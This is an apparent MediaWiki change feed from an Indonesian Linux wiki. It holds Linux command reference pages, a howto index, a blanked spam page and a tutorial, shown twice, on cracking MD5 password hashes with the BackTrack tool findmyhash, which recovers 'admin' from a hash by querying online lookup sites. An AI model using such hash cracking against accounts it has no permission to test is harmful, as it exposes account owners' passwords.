* [[Menggunakan GnuPG]]&lt;br /&gt;
* [[GnuPG Mini Howto]]&lt;br /&gt;
* [[GnuPG Privacy Handbook]]&lt;br /&gt;
* [[Ubah Nomor Port sshd]]&lt;br /&gt;
* [[Login SSH Otomatis Tanpa Password]]&lt;br /&gt;
&lt;br /&gt;
===Anti Virus===&lt;br /&gt;
* [[Instalasi antivirus clamav]]&lt;br /&gt;
&lt;br /&gt;
===Mematikan Mesin Windows Jarak Jauh===&lt;br /&gt;
&lt;br /&gt;
* http://www.howtoforge.com/how-to-remotely-shut-down-windows-xp-computers-from-a-linux-server&lt;br /&gt;
* http://www.lgr.ca/blog/2008/04/shutdown-windows-from-linux.html&lt;br /&gt;
* http://www.linuxforums.org/forum/redhat-fedora-linux-help/60324-remote-shutdown-windows-linux-box.html&lt;br /&gt;
* http://landofthefreeish.com/linux/howto-remote-shutdown-of-a-windows-computer-from-linux/&lt;br /&gt;
* http://blog.beausanders.com/?q=node/8&lt;br /&gt;
&lt;br /&gt;
==Selular==&lt;br /&gt;
* [[Instalasi Wammu]] - mobile phone manager di [[linux]]&lt;br /&gt;
* [[Mengoperasikan Wammu]] - mobile phone manager di [[linux]]&lt;br /&gt;
* [[instalasi Gnokii]] - mobile phone manager di [[linux]]&lt;br /&gt;
* [[Mengoperasikan Gnokii]] - mobile phone manager di [[linux]]&lt;br /&gt;
&lt;br /&gt;
==[[Amatir Radio]] di [[Linux]]==&lt;br /&gt;
&lt;br /&gt;
* [[Membangun Gateway Packet Radio di Linux]]&lt;br /&gt;
* [[Membangun F6FBB BBS di Linux]]&lt;br /&gt;
* [[Instalasi Fldigi]] dan [[Compile Fldigi]] naga-naganya lebih baik di compile&lt;br /&gt;
* [[Instalasi PSKmail]] [[Gateway]] [[e-mail]] &amp;amp; telnet antara [[HF]] / [[VHF]] ke [[Internet]] untuk [[EMCOM]]&lt;br /&gt;
* [[Instalasi XASTIR untuk APRS di Linux]]&lt;br /&gt;
* [[Echolinux: Echolink di Linux]]&lt;br /&gt;
&lt;br /&gt;
===[[Elektronika di Linux]]===&lt;br /&gt;
===[[Amatir Radio di Linux]]===&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
&lt;br /&gt;
* http://www.revolution-os.com/&lt;br /&gt;
* http://pemulalinux.com/&lt;br /&gt;
* http://wiki.warneter.net/&lt;br /&gt;
* http://linux.101hacks.com/&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
&lt;br /&gt;
* [[Tip Membangun Server Sendiri]]&lt;br /&gt;
&lt;br /&gt;
Ada baiknya mendownload &amp;amp; menbaca-baca file yang ada di URL berikut. File tersebut kebanyakan di ambil dari situs [http://www.tldp.org The Linux Documentation Project].&lt;br /&gt;
&lt;br /&gt;
* Kumpulan dokumentasi bagi pemula Linux - http://opensource.telkompspeedy.com/speedyorari/index.php?dir=library/library-sw-hw/linux-intro&lt;br /&gt;
* Kumpulan dokumentasi Howto Linux yang lebih lengkap - http://opensource.telkompspeedy.com/speedyorari/index.php?dir=library/library-sw-hw/linux-howto&lt;br /&gt;
* Kumpulan Buku-buku detail berbagai teknik menggunakan Linux - http://opensource.telkompspeedy.com/speedyorari/index.php?dir=library/library-sw-hw/linux-guide&lt;br /&gt;
* Beberapa Frequently Asked Question (FAQ) tentang Linux - http://opensource.telkompspeedy.com/speedyorari/index.php?dir=library/library-sw-hw/linux-faq&lt;br /&gt;
&lt;br /&gt;
[[Category: Linux]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Perintah_Linux_T&amp;diff=32333</id>
		<title>Perintah Linux T</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Perintah_Linux_T&amp;diff=32333"/>
		<updated>2012-05-24T05:55:06Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Contoh */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Indeks Perintah Linux | Indeks]] -&lt;br /&gt;
[[Perintah Linux A | A]] -&lt;br /&gt;
[[Perintah Linux B | B]] -&lt;br /&gt;
[[Perintah Linux C | C]] -&lt;br /&gt;
[[Perintah Linux D | D]] -&lt;br /&gt;
[[Perintah Linux E | E]] -&lt;br /&gt;
[[Perintah Linux F | F]] -&lt;br /&gt;
[[Perintah Linux G | G]] -&lt;br /&gt;
[[Perintah Linux H | H]] -&lt;br /&gt;
[[Perintah Linux I | I]] -&lt;br /&gt;
[[Perintah Linux J | J]] -&lt;br /&gt;
[[Perintah Linux K | K]] -&lt;br /&gt;
[[Perintah Linux L | L]] -&lt;br /&gt;
[[Perintah Linux M | M]] -&lt;br /&gt;
[[Perintah Linux N | N]] -&lt;br /&gt;
[[Perintah Linux O | O]] -&lt;br /&gt;
[[Perintah Linux P | P]] -&lt;br /&gt;
[[Perintah Linux Q | Q]] -&lt;br /&gt;
[[Perintah Linux R | R]] -&lt;br /&gt;
[[Perintah Linux S | S]] -&lt;br /&gt;
[[Perintah Linux T | T]] -&lt;br /&gt;
[[Perintah Linux U | U]] -&lt;br /&gt;
[[Perintah Linux V | V]] -&lt;br /&gt;
[[Perintah Linux W | W]] -&lt;br /&gt;
[[Perintah Linux X | X]] -&lt;br /&gt;
[[Perintah Linux Y | Y]] -&lt;br /&gt;
[[Perintah Linux Z | Z]] &lt;br /&gt;
=tac=&lt;br /&gt;
=tail=&lt;br /&gt;
Menampilkan bagian akhir dari sebuah file&lt;br /&gt;
&lt;br /&gt;
Contoh:&lt;br /&gt;
 root@batik:/var/log# tail messages&lt;br /&gt;
 May 24 11:00:00 bt smsd: Writing stats file 120524.110000&lt;br /&gt;
 May 24 11:37:02 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 11:39:42 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 11:41:18 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 12:00:00 bt smsd: Writing stats file 120524.120000&lt;br /&gt;
 May 24 12:37:21 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 12:39:51 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 12:40:10 bt pulseaudio[1623]: ratelimit.c: 3 events suppressed&lt;br /&gt;
 May 24 12:41:57 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 12:43:10 bt pulseaudio[1623]: last message repeated 2 times&lt;br /&gt;
&lt;br /&gt;
=tailf=&lt;br /&gt;
=talk=&lt;br /&gt;
=talkd=&lt;br /&gt;
=tar=&lt;br /&gt;
=taskset=&lt;br /&gt;
=tcpd=&lt;br /&gt;
=tcpdump=&lt;br /&gt;
=tcpslice=&lt;br /&gt;
=tee=&lt;br /&gt;
=telinit=&lt;br /&gt;
=telnet=&lt;br /&gt;
=telnetd=&lt;br /&gt;
=test=&lt;br /&gt;
=tftp=&lt;br /&gt;
=tftpd=&lt;br /&gt;
=time=&lt;br /&gt;
=tload=&lt;br /&gt;
=tmpwatch=&lt;br /&gt;
=top=&lt;br /&gt;
=touch=&lt;br /&gt;
=tr=&lt;br /&gt;
=tracepath=&lt;br /&gt;
=traceroute=&lt;br /&gt;
=troff=&lt;br /&gt;
=true=&lt;br /&gt;
=tset=&lt;br /&gt;
=tsort=&lt;br /&gt;
=tty=&lt;br /&gt;
=tune2fs=&lt;br /&gt;
=tunelp=&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Perintah_Linux_T&amp;diff=32332</id>
		<title>Perintah Linux T</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Perintah_Linux_T&amp;diff=32332"/>
		<updated>2012-05-24T05:54:31Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* tail */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Indeks Perintah Linux | Indeks]] -&lt;br /&gt;
[[Perintah Linux A | A]] -&lt;br /&gt;
[[Perintah Linux B | B]] -&lt;br /&gt;
[[Perintah Linux C | C]] -&lt;br /&gt;
[[Perintah Linux D | D]] -&lt;br /&gt;
[[Perintah Linux E | E]] -&lt;br /&gt;
[[Perintah Linux F | F]] -&lt;br /&gt;
[[Perintah Linux G | G]] -&lt;br /&gt;
[[Perintah Linux H | H]] -&lt;br /&gt;
[[Perintah Linux I | I]] -&lt;br /&gt;
[[Perintah Linux J | J]] -&lt;br /&gt;
[[Perintah Linux K | K]] -&lt;br /&gt;
[[Perintah Linux L | L]] -&lt;br /&gt;
[[Perintah Linux M | M]] -&lt;br /&gt;
[[Perintah Linux N | N]] -&lt;br /&gt;
[[Perintah Linux O | O]] -&lt;br /&gt;
[[Perintah Linux P | P]] -&lt;br /&gt;
[[Perintah Linux Q | Q]] -&lt;br /&gt;
[[Perintah Linux R | R]] -&lt;br /&gt;
[[Perintah Linux S | S]] -&lt;br /&gt;
[[Perintah Linux T | T]] -&lt;br /&gt;
[[Perintah Linux U | U]] -&lt;br /&gt;
[[Perintah Linux V | V]] -&lt;br /&gt;
[[Perintah Linux W | W]] -&lt;br /&gt;
[[Perintah Linux X | X]] -&lt;br /&gt;
[[Perintah Linux Y | Y]] -&lt;br /&gt;
[[Perintah Linux Z | Z]] &lt;br /&gt;
=tac=&lt;br /&gt;
=tail=&lt;br /&gt;
Menampilkan bagian akhir dari sebuah file&lt;br /&gt;
&lt;br /&gt;
===Contoh===&lt;br /&gt;
 root@batik:/var/log# tail messages&lt;br /&gt;
 May 24 11:00:00 bt smsd: Writing stats file 120524.110000&lt;br /&gt;
 May 24 11:37:02 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 11:39:42 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 11:41:18 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 12:00:00 bt smsd: Writing stats file 120524.120000&lt;br /&gt;
 May 24 12:37:21 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 12:39:51 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 12:40:10 bt pulseaudio[1623]: ratelimit.c: 3 events suppressed&lt;br /&gt;
 May 24 12:41:57 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 12:43:10 bt pulseaudio[1623]: last message repeated 2 times&lt;br /&gt;
&lt;br /&gt;
=tailf=&lt;br /&gt;
=talk=&lt;br /&gt;
=talkd=&lt;br /&gt;
=tar=&lt;br /&gt;
=taskset=&lt;br /&gt;
=tcpd=&lt;br /&gt;
=tcpdump=&lt;br /&gt;
=tcpslice=&lt;br /&gt;
=tee=&lt;br /&gt;
=telinit=&lt;br /&gt;
=telnet=&lt;br /&gt;
=telnetd=&lt;br /&gt;
=test=&lt;br /&gt;
=tftp=&lt;br /&gt;
=tftpd=&lt;br /&gt;
=time=&lt;br /&gt;
=tload=&lt;br /&gt;
=tmpwatch=&lt;br /&gt;
=top=&lt;br /&gt;
=touch=&lt;br /&gt;
=tr=&lt;br /&gt;
=tracepath=&lt;br /&gt;
=traceroute=&lt;br /&gt;
=troff=&lt;br /&gt;
=true=&lt;br /&gt;
=tset=&lt;br /&gt;
=tsort=&lt;br /&gt;
=tty=&lt;br /&gt;
=tune2fs=&lt;br /&gt;
=tunelp=&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Perintah_Linux_T&amp;diff=32331</id>
		<title>Perintah Linux T</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Perintah_Linux_T&amp;diff=32331"/>
		<updated>2012-05-24T05:54:12Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* tail */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Indeks Perintah Linux | Indeks]] -&lt;br /&gt;
[[Perintah Linux A | A]] -&lt;br /&gt;
[[Perintah Linux B | B]] -&lt;br /&gt;
[[Perintah Linux C | C]] -&lt;br /&gt;
[[Perintah Linux D | D]] -&lt;br /&gt;
[[Perintah Linux E | E]] -&lt;br /&gt;
[[Perintah Linux F | F]] -&lt;br /&gt;
[[Perintah Linux G | G]] -&lt;br /&gt;
[[Perintah Linux H | H]] -&lt;br /&gt;
[[Perintah Linux I | I]] -&lt;br /&gt;
[[Perintah Linux J | J]] -&lt;br /&gt;
[[Perintah Linux K | K]] -&lt;br /&gt;
[[Perintah Linux L | L]] -&lt;br /&gt;
[[Perintah Linux M | M]] -&lt;br /&gt;
[[Perintah Linux N | N]] -&lt;br /&gt;
[[Perintah Linux O | O]] -&lt;br /&gt;
[[Perintah Linux P | P]] -&lt;br /&gt;
[[Perintah Linux Q | Q]] -&lt;br /&gt;
[[Perintah Linux R | R]] -&lt;br /&gt;
[[Perintah Linux S | S]] -&lt;br /&gt;
[[Perintah Linux T | T]] -&lt;br /&gt;
[[Perintah Linux U | U]] -&lt;br /&gt;
[[Perintah Linux V | V]] -&lt;br /&gt;
[[Perintah Linux W | W]] -&lt;br /&gt;
[[Perintah Linux X | X]] -&lt;br /&gt;
[[Perintah Linux Y | Y]] -&lt;br /&gt;
[[Perintah Linux Z | Z]] &lt;br /&gt;
=tac=&lt;br /&gt;
=tail=&lt;br /&gt;
Menampilkan bagian akhir dari sebuah file&lt;br /&gt;
&lt;br /&gt;
==Contoh==&lt;br /&gt;
 root@batik:/var/log# tail messages&lt;br /&gt;
 May 24 11:00:00 bt smsd: Writing stats file 120524.110000&lt;br /&gt;
 May 24 11:37:02 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 11:39:42 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 11:41:18 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 12:00:00 bt smsd: Writing stats file 120524.120000&lt;br /&gt;
 May 24 12:37:21 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 12:39:51 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 12:40:10 bt pulseaudio[1623]: ratelimit.c: 3 events suppressed&lt;br /&gt;
 May 24 12:41:57 bt pulseaudio[1623]: ratelimit.c: 1 events suppressed&lt;br /&gt;
 May 24 12:43:10 bt pulseaudio[1623]: last message repeated 2 times&lt;br /&gt;
&lt;br /&gt;
=tailf=&lt;br /&gt;
=talk=&lt;br /&gt;
=talkd=&lt;br /&gt;
=tar=&lt;br /&gt;
=taskset=&lt;br /&gt;
=tcpd=&lt;br /&gt;
=tcpdump=&lt;br /&gt;
=tcpslice=&lt;br /&gt;
=tee=&lt;br /&gt;
=telinit=&lt;br /&gt;
=telnet=&lt;br /&gt;
=telnetd=&lt;br /&gt;
=test=&lt;br /&gt;
=tftp=&lt;br /&gt;
=tftpd=&lt;br /&gt;
=time=&lt;br /&gt;
=tload=&lt;br /&gt;
=tmpwatch=&lt;br /&gt;
=top=&lt;br /&gt;
=touch=&lt;br /&gt;
=tr=&lt;br /&gt;
=tracepath=&lt;br /&gt;
=traceroute=&lt;br /&gt;
=troff=&lt;br /&gt;
=true=&lt;br /&gt;
=tset=&lt;br /&gt;
=tsort=&lt;br /&gt;
=tty=&lt;br /&gt;
=tune2fs=&lt;br /&gt;
=tunelp=&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Perintah_Linux_U&amp;diff=32330</id>
		<title>Perintah Linux U</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Perintah_Linux_U&amp;diff=32330"/>
		<updated>2012-05-24T05:50:17Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* users */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Indeks Perintah Linux | Indeks]] -&lt;br /&gt;
[[Perintah Linux A | A]] -&lt;br /&gt;
[[Perintah Linux B | B]] -&lt;br /&gt;
[[Perintah Linux C | C]] -&lt;br /&gt;
[[Perintah Linux D | D]] -&lt;br /&gt;
[[Perintah Linux E | E]] -&lt;br /&gt;
[[Perintah Linux F | F]] -&lt;br /&gt;
[[Perintah Linux G | G]] -&lt;br /&gt;
[[Perintah Linux H | H]] -&lt;br /&gt;
[[Perintah Linux I | I]] -&lt;br /&gt;
[[Perintah Linux J | J]] -&lt;br /&gt;
[[Perintah Linux K | K]] -&lt;br /&gt;
[[Perintah Linux L | L]] -&lt;br /&gt;
[[Perintah Linux M | M]] -&lt;br /&gt;
[[Perintah Linux N | N]] -&lt;br /&gt;
[[Perintah Linux O | O]] -&lt;br /&gt;
[[Perintah Linux P | P]] -&lt;br /&gt;
[[Perintah Linux Q | Q]] -&lt;br /&gt;
[[Perintah Linux R | R]] -&lt;br /&gt;
[[Perintah Linux S | S]] -&lt;br /&gt;
[[Perintah Linux T | T]] -&lt;br /&gt;
[[Perintah Linux U | U]] -&lt;br /&gt;
[[Perintah Linux V | V]] -&lt;br /&gt;
[[Perintah Linux W | W]] -&lt;br /&gt;
[[Perintah Linux X | X]] -&lt;br /&gt;
[[Perintah Linux Y | Y]] -&lt;br /&gt;
[[Perintah Linux Z | Z]] &lt;br /&gt;
&lt;br /&gt;
=ul=&lt;br /&gt;
=umount=&lt;br /&gt;
=uname=&lt;br /&gt;
=uncompress=&lt;br /&gt;
=unexpand=&lt;br /&gt;
=unicode_start=&lt;br /&gt;
=unicode_stop=&lt;br /&gt;
=uniq=&lt;br /&gt;
=uptime=&lt;br /&gt;
&#039;&#039;Menampilkan lama penggunaan komputer&#039;&#039;&lt;br /&gt;
 $ uptime&lt;br /&gt;
 contoh: 17:08:49 up 5:54, 6 users, load average: 2.03, 1.68, 1.50&lt;br /&gt;
 * 17:08:49 (Waktu sekarang)&lt;br /&gt;
 * 5:54 (Lama penggunaan komputer)&lt;br /&gt;
 * 6 users (Jumlah user sedang login)&lt;br /&gt;
 * 2.03, 1.68, 1.50 (Load Average)&lt;br /&gt;
&lt;br /&gt;
=useradd=&lt;br /&gt;
=userdel=&lt;br /&gt;
=usermod=&lt;br /&gt;
=users=&lt;br /&gt;
Menampilkan username yang sedang login di host tersebut&lt;br /&gt;
&lt;br /&gt;
Contoh:&lt;br /&gt;
 adi@batik:~/Desktop$ users&lt;br /&gt;
 adi adi adi&lt;br /&gt;
&lt;br /&gt;
=usleep=&lt;br /&gt;
=uudecode=&lt;br /&gt;
=uuencode=&lt;br /&gt;
=uuidgen=&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Practical_san_diego_surgeon_Courses_Explained&amp;diff=32254</id>
		<title>Practical san diego surgeon Courses Explained</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Practical_san_diego_surgeon_Courses_Explained&amp;diff=32254"/>
		<updated>2012-05-20T07:12:13Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: Removing all content from page&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Practical_san_diego_surgeon_Courses_Explained&amp;diff=32253</id>
		<title>Practical san diego surgeon Courses Explained</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Practical_san_diego_surgeon_Courses_Explained&amp;diff=32253"/>
		<updated>2012-05-20T07:12:02Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;http:/testinng.com&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Cracking_MD5_Dengan_findmyhash&amp;diff=30803</id>
		<title>Cracking MD5 Dengan findmyhash</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Cracking_MD5_Dengan_findmyhash&amp;diff=30803"/>
		<updated>2012-03-11T14:21:35Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;sumber: http://adinugroho.web.id/tutorial/linux/cracking-md5-dengan-findmyhash.html&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;findmyhash&#039;&#039;&#039; adalah tool yang berguna untuk men-decrypt [[hash]] yang kita miliki. Tool ini akan memasukkan hash kita ke berbagai website [[encrypter]].&amp;lt;em&amp;gt;(kira-kira begitu)&amp;lt;/em&amp;gt;&lt;br /&gt;
Kalau di [[BackTrack]] tempatnya ada di /pentest/passwords/findmyhash&lt;br /&gt;
&lt;br /&gt;
==Developer==&lt;br /&gt;
Yang bikin findmyhash adalah: &lt;br /&gt;
 [Web]           http://laxmarcaellugar.blogspot.com/&lt;br /&gt;
 [Mail/Google+]  bloglaxmarcaellugar@gmail.com&lt;br /&gt;
 [twitter]       @laXmarcaellugar&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Daftar Hash ==&lt;br /&gt;
Hash yang bisa di-decrypt dengan findmyhash:&lt;br /&gt;
&lt;br /&gt;
*  MD4       - RFC 1320&lt;br /&gt;
*  MD5       - RFC 1321&lt;br /&gt;
*  SHA1      - RFC 3174 (FIPS 180-3)&lt;br /&gt;
*  SHA224    - RFC 3874 (FIPS 180-3)&lt;br /&gt;
*  SHA256    - FIPS 180-3&lt;br /&gt;
*  SHA384    - FIPS 180-3&lt;br /&gt;
*  SHA512    - FIPS 180-3&lt;br /&gt;
*  RMD160    - RFC 2857&lt;br /&gt;
*  GOST      - RFC 5831&lt;br /&gt;
*  WHIRLPOOL - ISO/IEC 10118-3:2004&lt;br /&gt;
*  LM        - Microsoft Windows hash&lt;br /&gt;
*  NTLM      - Microsoft Windows hash&lt;br /&gt;
*  MYSQL     - MySQL 3, 4, 5 hash&lt;br /&gt;
*  CISCO7    - Cisco IOS type 7 encrypted passwords&lt;br /&gt;
*  JUNIPER   - Juniper Networks $9$ encrypted passwords&lt;br /&gt;
*  LDAP_MD5  - MD5 Base64 encoded&lt;br /&gt;
*  LDAP_SHA1 - SHA1 Base64 encoded&lt;br /&gt;
&lt;br /&gt;
== Contoh Penggunaan==&lt;br /&gt;
Contoh penggunaan findmyhash untuk cracking md5&lt;br /&gt;
&lt;br /&gt;
 root@batik:/pentest/passwords/findmyhash# ./findmyhash.py MD5 -h 21232f297a57a5a743894a0e4a801fc3 &lt;br /&gt;
 &lt;br /&gt;
 Cracking hash: 21232f297a57a5a743894a0e4a801fc3 &lt;br /&gt;
  &lt;br /&gt;
 Analyzing with cmd5 (http://www.cmd5.org)...&lt;br /&gt;
 ... hash not found in cmd5&lt;br /&gt;
 &lt;br /&gt;
 Analyzing with bigtrapeze (http://www.bigtrapeze.com)...&lt;br /&gt;
 ... hash not found in bigtrapeze&lt;br /&gt;
 &lt;br /&gt;
 Analyzing with hashchecker (http://www.hashchecker.com)...&lt;br /&gt;
 ... hash not found in hashchecker&lt;br /&gt;
 &lt;br /&gt;
 Analyzing with md5hashcracker (http://md5hashcracker.appspot.com)...&lt;br /&gt;
 &lt;br /&gt;
 ***** HASH CRACKED!! *****&lt;br /&gt;
 The original string is: admin&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 The following hashes were cracked:&lt;br /&gt;
 ----------------------------------&lt;br /&gt;
 &lt;br /&gt;
 21232f297a57a5a743894a0e4a801fc3 -&amp;gt; admin&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Backtrack]]&lt;br /&gt;
* [[Linux Howto]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Cracking_MD5_Dengan_findmyhash&amp;diff=30802</id>
		<title>Cracking MD5 Dengan findmyhash</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Cracking_MD5_Dengan_findmyhash&amp;diff=30802"/>
		<updated>2012-03-11T14:21:11Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;sumber: http://adinugroho.web.id/tutorial/linux/cracking-md5-dengan-findmyhash.html&lt;br /&gt;
&#039;&#039;&#039;findmyhash&#039;&#039;&#039; adalah tool yang berguna untuk men-decrypt [[hash]] yang kita miliki. Tool ini akan memasukkan hash kita ke berbagai website [[encrypter]].&amp;lt;em&amp;gt;(kira-kira begitu)&amp;lt;/em&amp;gt;&lt;br /&gt;
Kalau di [[BackTrack]] tempatnya ada di /pentest/passwords/findmyhash&lt;br /&gt;
&lt;br /&gt;
==Developer==&lt;br /&gt;
Yang bikin findmyhash adalah: &lt;br /&gt;
 [Web]           http://laxmarcaellugar.blogspot.com/&lt;br /&gt;
 [Mail/Google+]  bloglaxmarcaellugar@gmail.com&lt;br /&gt;
 [twitter]       @laXmarcaellugar&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Daftar Hash ==&lt;br /&gt;
Hash yang bisa di-decrypt dengan findmyhash:&lt;br /&gt;
&lt;br /&gt;
*  MD4       - RFC 1320&lt;br /&gt;
*  MD5       - RFC 1321&lt;br /&gt;
*  SHA1      - RFC 3174 (FIPS 180-3)&lt;br /&gt;
*  SHA224    - RFC 3874 (FIPS 180-3)&lt;br /&gt;
*  SHA256    - FIPS 180-3&lt;br /&gt;
*  SHA384    - FIPS 180-3&lt;br /&gt;
*  SHA512    - FIPS 180-3&lt;br /&gt;
*  RMD160    - RFC 2857&lt;br /&gt;
*  GOST      - RFC 5831&lt;br /&gt;
*  WHIRLPOOL - ISO/IEC 10118-3:2004&lt;br /&gt;
*  LM        - Microsoft Windows hash&lt;br /&gt;
*  NTLM      - Microsoft Windows hash&lt;br /&gt;
*  MYSQL     - MySQL 3, 4, 5 hash&lt;br /&gt;
*  CISCO7    - Cisco IOS type 7 encrypted passwords&lt;br /&gt;
*  JUNIPER   - Juniper Networks $9$ encrypted passwords&lt;br /&gt;
*  LDAP_MD5  - MD5 Base64 encoded&lt;br /&gt;
*  LDAP_SHA1 - SHA1 Base64 encoded&lt;br /&gt;
&lt;br /&gt;
== Contoh Penggunaan==&lt;br /&gt;
Contoh penggunaan findmyhash untuk cracking md5&lt;br /&gt;
&lt;br /&gt;
 root@batik:/pentest/passwords/findmyhash# ./findmyhash.py MD5 -h 21232f297a57a5a743894a0e4a801fc3 &lt;br /&gt;
 &lt;br /&gt;
 Cracking hash: 21232f297a57a5a743894a0e4a801fc3 &lt;br /&gt;
  &lt;br /&gt;
 Analyzing with cmd5 (http://www.cmd5.org)...&lt;br /&gt;
 ... hash not found in cmd5&lt;br /&gt;
 &lt;br /&gt;
 Analyzing with bigtrapeze (http://www.bigtrapeze.com)...&lt;br /&gt;
 ... hash not found in bigtrapeze&lt;br /&gt;
 &lt;br /&gt;
 Analyzing with hashchecker (http://www.hashchecker.com)...&lt;br /&gt;
 ... hash not found in hashchecker&lt;br /&gt;
 &lt;br /&gt;
 Analyzing with md5hashcracker (http://md5hashcracker.appspot.com)...&lt;br /&gt;
 &lt;br /&gt;
 ***** HASH CRACKED!! *****&lt;br /&gt;
 The original string is: admin&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 The following hashes were cracked:&lt;br /&gt;
 ----------------------------------&lt;br /&gt;
 &lt;br /&gt;
 21232f297a57a5a743894a0e4a801fc3 -&amp;gt; admin&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Backtrack]]&lt;br /&gt;
* [[Linux Howto]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Backtrack&amp;diff=30801</id>
		<title>Backtrack</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Backtrack&amp;diff=30801"/>
		<updated>2012-03-11T14:18:47Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Hacking */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Salah satu distro [[linux]] yang awalnya merupakan turunan dari [[slackware]]. Backtrack merupakan merger dari [[whax]] dan [[auditor security collection]]. Sekarang ini [[Backtrack]] berbasis [[Debian]]. Backtrack menjadi tool yang sangat baik bagi mereka yang ingin belajar teknik hacking dan [[keamanan jaringan]]. [[Backtrack]] dapat di ambil secara bebas dari&lt;br /&gt;
&lt;br /&gt;
 &#039;&#039;&#039;http://www.backtrack-linux.org/downloads/&#039;&#039;&#039;&lt;br /&gt;
 http://opensource.telkomspeedy.com/repo/backtrack&lt;br /&gt;
 http://belajar.internetsehat.org/iso/backtrack-5.0&lt;br /&gt;
 http://bebasupload.com/users/yusuf/3261/indobacktrack.or.id BackTrack 5 dr IndoBackTrack&lt;br /&gt;
 http://repo.antihackerlink.or.id/download.php?list.88&lt;br /&gt;
 http://iso.ukdw.ac.id/backtrack5/&lt;br /&gt;
 http://pandawa.ipb.ac.id/iso/backtrack/bt5/ &lt;br /&gt;
&lt;br /&gt;
